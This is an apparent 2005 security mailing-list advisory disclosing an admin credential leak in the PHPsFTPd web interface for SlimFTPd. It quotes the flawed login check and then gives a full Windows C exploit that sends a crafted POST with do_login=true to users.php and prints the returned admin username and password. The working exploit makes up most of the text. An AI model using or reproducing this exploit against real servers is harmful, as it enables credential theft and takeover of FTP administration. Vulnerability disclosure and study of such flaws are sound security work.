<<< Date Index >>>     <<< Thread Index >>>

PHPsFTPd - Admin password leak



Author:         Stefan Lochbihler
Date:           11. Juli 2005
Affected        Software: PHPsFTPd
Software        Version: 0.2 -> 0.4
Software        URL: http://phpsftpd.sourceforge.net/
Attack:         Admin password leak


about PHPsFTPd:
PHPsFTPd is a web based administration and configuration interface
for the SLimFTPd ftp serverIt can be used an any http server that
suports PHP and does not need a database or adittional php modules,
only SlimFTPD It allows the administrators of the ftp server to
configurate it from within this interface as opposed to its native
ascii conf.file It shows statistics about the users that accesed
the server , the files that were downloaded , server breakdowns etc


Hi there again

during a look at the code of the PHPsFTPd Project i find out that it
is possible to get the Admins Username & Password. This happens
when we send a specially crafted POST Request to the user.php script.
The reason of the leakness is at the inc.login.php script.
When you take a look at the code below you see that the code will exit
if there is no logged session or we dont try to logout.
But when we POST the do_login var with some stuff in it execution goes on.


snipped from inc.login.php


//login form
if (!isset($_SESSION['logged']) && !isset($_GET['do_logout']) &&
!isset($_POST['do_login'])) {
                echo "<p>&nbsp;</p>
                <form action='index.php' method='post'>
                <img src=gfx/ico_notice.gif align=absmiddle> Please login with 
admin
pass<br>
                <input class=td type='password' name='pass'>
                <input class=button type='submit' name='login' value='Login'>
                </form>
                ";
                die;
}





exploit:
Print the admins username & password



// PHPsFTPd Admin Password Leak
// tested on a WinXP SP1 box



#include "stdafx.h"
#include "stdio.h"
#include "winsock2.h"

#pragma comment (lib,"ws2_32")

#define PORT 80
#define rootdir "/phpsftpd/"


typedef unsigned long ulong;


void usage(char *);
ulong checkhost(char *);



ulong checkhost(char *host)
{
struct hostent *hp;
ulong host_ip=0;

host_ip=inet_addr(host);
if(host_ip==INADDR_NONE){
    hp=gethostbyname(host);
if(!hp){
     printf("unable to resolv host...\n");
        exit(1);
        }

   host_ip= *(ulong*)hp->h_addr;

}

return host_ip;

}


void usage (char *progn){

printf("Usage[%s]: www.targethost.com\n",progn);
exit(0);

}




int main(int argc, char* argv[])
{

   WSADATA wsa;
   SOCKET client;
   WORD wsVersion;

   char httpRequest[1024];
   char recvBuffer[1024];

   char *p;

   struct sockaddr_in addr;
   int err=0,recvSize=0;

   printf("PHPsFTPd Exploit v0.1 (c) by Steve mailto:steve01@xxxxxxxxx\n";);

     if(argc<2)
      usage(argv[0]);
        

wsVersion=MAKEWORD(2,0);

   if(err=WSAStartup(wsVersion,&wsa)){
    printf("Error: WSAStartup\n");
    exit(0);
}


    client=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
    if(client==INVALID_SOCKET){
    printf("Error: Create Socket\n");
    exit(0);
}


addr.sin_addr.s_addr = checkhost(argv[1]);
addr.sin_port = htons(PORT);
addr.sin_family = AF_INET;


memset(httpRequest,'\0',sizeof(httpRequest));

strncat(httpRequest,"POST ",sizeof(httpRequest)-strlen(httpRequest)-1);
strncat(httpRequest,rootdir,sizeof(httpRequest)-strlen(httpRequest)-1);
strncat(httpRequest,"users.php?action=edit&username=root
HTTP/1.1\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
strncat(httpRequest,"User-Agent: PHPSFTPD ACCOUNT
MANAGER\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
strncat(httpRequest,"Host:
www.targethost.com\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
strncat(httpRequest,"Content-Type:
application/x-www-form-urlencoded\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
strncat(httpRequest,"Content-Length:
13\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
strncat(httpRequest,"\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
strncat(httpRequest,"do_login=true\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);

err=connect(client,(SOCKADDR*)&addr,sizeof(addr));

//Get Http Stuff
send(client,httpRequest,strlen(httpRequest),0);
recvSize=recv(client,recvBuffer,sizeof(recvBuffer)-1,0);
recvBuffer[recvSize]='\0';
//Get username & password
recvSize=recv(client,recvBuffer,sizeof(recvBuffer)-1,0);
recvBuffer[recvSize]='\0';


//shit when anyone use a 0x20 on his password
p=strstr(recvBuffer,"value=");
printf("Username:");

for(p=p+6;*p!=0x20;p++)
putc(*p,stdout);

p=strstr(p,"value=");

printf("\n");
printf("Password:");

for(p=p+6;*p!=0x20;p++)
putc(*p,stdout);
        
        
closesocket(client);
WSACleanup();

printf("\n");
return 0;
}


Vendor Status: The Vendor is informed !

Discovered (c) by Steve





--
Erstellt mit Operas revolutionärem E-Mail-Modul: http://www.opera.com/m2/